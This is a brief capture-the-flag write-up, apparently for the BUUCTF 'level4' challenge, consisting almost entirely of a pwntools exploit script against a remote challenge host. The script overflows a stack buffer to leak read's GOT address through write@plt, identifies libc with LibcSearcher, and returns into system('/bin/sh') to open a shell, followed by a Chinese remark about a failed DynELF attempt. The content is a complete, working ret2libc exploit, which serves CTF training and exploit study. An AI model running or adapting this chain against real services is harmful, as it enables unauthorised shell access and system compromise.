直接上wp
"""Writeup script for the `level4` challenge: a two-stage return-to-libc over a
stack buffer overflow.

Stage 1 overflows the buffer and returns into write@plt to print one GOT entry
(the resolved address of `read`), then returns to `main` so the overflow can be
triggered a second time.  Stage 2 uses LibcSearcher to identify the remote libc
from that leaked address, computes the libc base, and returns into `system`
with a pointer to the libc's "/bin/sh" string.

From a defender's point of view the script documents what each missing
mitigation buys the attacker: no stack canary (the return address is
overwritable), a fixed load address (`main` and the PLT/GOT are used as absolute
addresses), and a readable GOT that exposes a libc pointer.
"""
from pwn import*
from LibcSearcher import*
# pwntools debug logging: every byte sent and received is echoed to the console.
context.log_level = 'debug'
# Local-debugging variant (process + gdb.attach) is kept commented out; the
# live run talks to the remote challenge instance instead.
#io = process('./level4')
io = remote("node4.buuoj.cn",28422)
#gdb.attach(io)
# Symbols are read from the local copy of the binary.  NOTE(review): using
# elf.sym['main'] and elf.plt['write'] as fixed 32-bit return addresses only
# works if the binary is not position independent — presumably the case here.
elf =ELF('./level4')
write_plt = elf.plt['write']
# NOTE(review): write_got is assigned but never used below.
write_got = elf.got['write']
read_got =elf.got['read']
main_addr = elf.sym['main']
# Stage 1 chain (32-bit, arguments on the stack):
#   0x88 bytes of filler (+4, presumably the saved EBP) reach the return address,
#   then write(1, &GOT[read], 4) with main_addr as write's return address.
# Assumes `read` has already been resolved by the loader so GOT[read] holds a
# libc address (the binary must have called read() before this point).
payload = b'a'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)
io.sendline(payload)
#pause()
# The 4 leaked bytes are the little-endian address of read() inside libc.
read_addr = u32(io.recv(4))
log.success('read ==>'+hex(read_addr))
# Identify the remote libc build from the leaked address (LibcSearcher matches
# on the low 12 bits, which ASLR leaves untouched), then derive base + offsets.
libc = LibcSearcher('read',read_addr)
libcbase = read_addr - libc.dump('read')
system_addr = libcbase +libc.dump('system')
bin_sh = libcbase +libc.dump('str_bin_sh')
# Stage 2 chain: same overflow, now returning into system("/bin/sh");
# main_addr is only a placeholder for system's own return address.
payload = b'a'*(0x88+4)+p32(system_addr)+p32(main_addr)+p32(bin_sh)
io.sendline(payload)
# Hand the connection to the user once the chain has run.
io.interactive()
尝试了用 DynELF 做，没有 binsh 就往 bss 段注入，但是好像没成功，懒得去用了，我现在也搞不清两种方法哪种好。
